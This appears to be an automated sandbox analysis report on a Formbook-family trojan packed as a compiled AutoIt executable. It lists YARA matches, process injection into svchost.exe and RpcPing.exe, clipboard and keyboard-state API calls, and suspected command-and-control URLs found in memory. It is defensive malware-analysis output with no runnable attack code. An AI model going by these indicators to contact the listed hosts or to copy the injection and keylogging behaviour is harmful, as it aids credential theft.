fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.motorsportgives.com
Source: DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.motorsportgives.com/9qp3/
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://aaa.za1.bztqk.cn/123.html
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6
Source: RpcPing.exe, 00000009.00000002.3338691097.00000000030A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RpcPing.exe, 00000009.00000003.2979596844.0000000007C65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RpcPing.exe, 00000009.00000002.3338691097.00000000030A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_007C425A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_007C4458
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_007C425A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_007B0219
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_007DCDAC

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: This is a third-party compiled AutoIt script. 0_2_00753B4C
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3342c16e-e
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_65349da8-f
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_fb7c4258-9
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a09d0e2e-e
Source: C:\Windows\SysWOW64\svchost.exe Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C223 NtClose, 2_2_0042C223
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72B60 NtClose,LdrInitializeThunk, 2_2_03C72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03C72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_03C72C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk, 2_2_03C735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C74340 NtSetContextThread, 2_2_03C74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C74650 NtSuspendThread, 2_2_03C74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72BE0 NtQueryValueKey, 2_2_03C72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72BF0 NtAllocateVirtualMemory, 2_2_03C72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72B80 NtQueryInformationFile, 2_2_03C72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72BA0 NtEnumerateValueKey, 2_2_03C72BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72AD0 NtReadFile, 2_2_03C72AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72AF0 NtWriteFile, 2_2_03C72AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72AB0 NtWaitForSingleObject, 2_2_03C72AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72FE0 NtCreateFile, 2_2_03C72FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72F90 NtProtectVirtualMemory, 2_2_03C72F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72FA0 NtQuerySection, 2_2_03C72FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72FB0 NtResumeThread, 2_2_03C72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72F60 NtCreateProcessEx, 2_2_03C72F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72F30 NtCreateSection, 2_2_03C72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72EE0 NtQueueApcThread, 2_2_03C72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72E80 NtReadVirtualMemory, 2_2_03C72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72EA0 NtAdjustPrivilegesToken, 2_2_03C72EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72E30 NtWriteVirtualMemory, 2_2_03C72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72DD0 NtDelayExecution, 2_2_03C72DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72DB0 NtEnumerateKey, 2_2_03C72DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72D00 NtSetInformationFile, 2_2_03C72D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72D10 NtMapViewOfSection, 2_2_03C72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72D30 NtUnmapViewOfSection, 2_2_03C72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72CC0 NtQueryVirtualMemory, 2_2_03C72CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72CF0 NtOpenProcess, 2_2_03C72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72CA0 NtQueryInformationToken, 2_2_03C72CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72C60 NtCreateKey, 2_2_03C72C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72C00 NtQueryInformationProcess, 2_2_03C72C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73090 NtSetValueKey, 2_2_03C73090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73010 NtOpenDirectoryObject, 2_2_03C73010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C739B0 NtGetContextThread, 2_2_03C739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73D70 NtOpenThread, 2_2_03C73D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73D10 NtOpenProcessToken, 2_2_03C73D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03524340 NtSetContextThread,LdrInitializeThunk, 9_2_03524340
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03524650 NtSuspendThread,LdrInitializeThunk, 9_2_03524650
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522B60 NtClose,LdrInitializeThunk, 9_2_03522B60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_03522BF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522BE0 NtQueryValueKey,LdrInitializeThunk, 9_2_03522BE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522BA0 NtEnumerateValueKey,LdrInitializeThunk, 9_2_03522BA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522AD0 NtReadFile,LdrInitializeThunk, 9_2_03522AD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522AF0 NtWriteFile,LdrInitializeThunk, 9_2_03522AF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522F30 NtCreateSection,LdrInitializeThunk, 9_2_03522F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522FE0 NtCreateFile,LdrInitializeThunk, 9_2_03522FE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522FB0 NtResumeThread,LdrInitializeThunk, 9_2_03522FB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522EE0 NtQueueApcThread,LdrInitializeThunk, 9_2_03522EE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522E80 NtReadVirtualMemory,LdrInitializeThunk, 9_2_03522E80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_03522D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522D30 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_03522D30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522DD0 NtDelayExecution,LdrInitializeThunk, 9_2_03522DD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03522DF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_03522C70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522C60 NtCreateKey,LdrInitializeThunk, 9_2_03522C60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_03522CA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035235C0 NtCreateMutant,LdrInitializeThunk, 9_2_035235C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035239B0 NtGetContextThread,LdrInitializeThunk, 9_2_035239B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522B80 NtQueryInformationFile, 9_2_03522B80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522AB0 NtWaitForSingleObject, 9_2_03522AB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522F60 NtCreateProcessEx, 9_2_03522F60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522F90 NtProtectVirtualMemory, 9_2_03522F90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522FA0 NtQuerySection, 9_2_03522FA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522E30 NtWriteVirtualMemory, 9_2_03522E30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522EA0 NtAdjustPrivilegesToken, 9_2_03522EA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522D00 NtSetInformationFile, 9_2_03522D00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522DB0 NtEnumerateKey, 9_2_03522DB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522C00 NtQueryInformationProcess, 9_2_03522C00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522CC0 NtQueryVirtualMemory, 9_2_03522CC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03522CF0 NtOpenProcess, 9_2_03522CF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03523010 NtOpenDirectoryObject, 9_2_03523010
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03523090 NtSetValueKey, 9_2_03523090
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03523D70 NtOpenThread, 9_2_03523D70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03523D10 NtOpenProcessToken, 9_2_03523D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02CA8B00 NtReadFile, 9_2_02CA8B00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02CA8990 NtCreateFile, 9_2_02CA8990
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02CA8E10 NtAllocateVirtualMemory, 9_2_02CA8E10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02CA8CB0 NtClose, 9_2_02CA8CB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02CA8C00 NtDeleteFile, 9_2_02CA8C00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B4021: CreateFileW,DeviceIoControl,CloseHandle, 0_2_007B4021
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_007A8858
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_007B545F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0075E800 0_2_0075E800
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077DBB5 0_2_0077DBB5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0075E060 0_2_0075E060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007D804A 0_2_007D804A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00764140 0_2_00764140
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00772405 0_2_00772405
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00786522 0_2_00786522
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0078267E 0_2_0078267E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007D0665 0_2_007D0665
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00766843 0_2_00766843
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077283A 0_2_0077283A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007889DF 0_2_007889DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00768A0E 0_2_00768A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007D0AE2 0_2_007D0AE2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00786A94 0_2_00786A94
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B8B13 0_2_007B8B13
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007AEB07 0_2_007AEB07
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077CD61 0_2_0077CD61
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00787006 0_2_00787006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0076710E 0_2_0076710E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00763190 0_2_00763190
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00751287 0_2_00751287
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007733C7 0_2_007733C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077F419 0_2_0077F419
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007716C4 0_2_007716C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00765680 0_2_00765680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007778D3 0_2_007778D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007658C0 0_2_007658C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00771BB8 0_2_00771BB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00789D05 0_2_00789D05
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0075FE40 0_2_0075FE40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077BFE6 0_2_0077BFE6
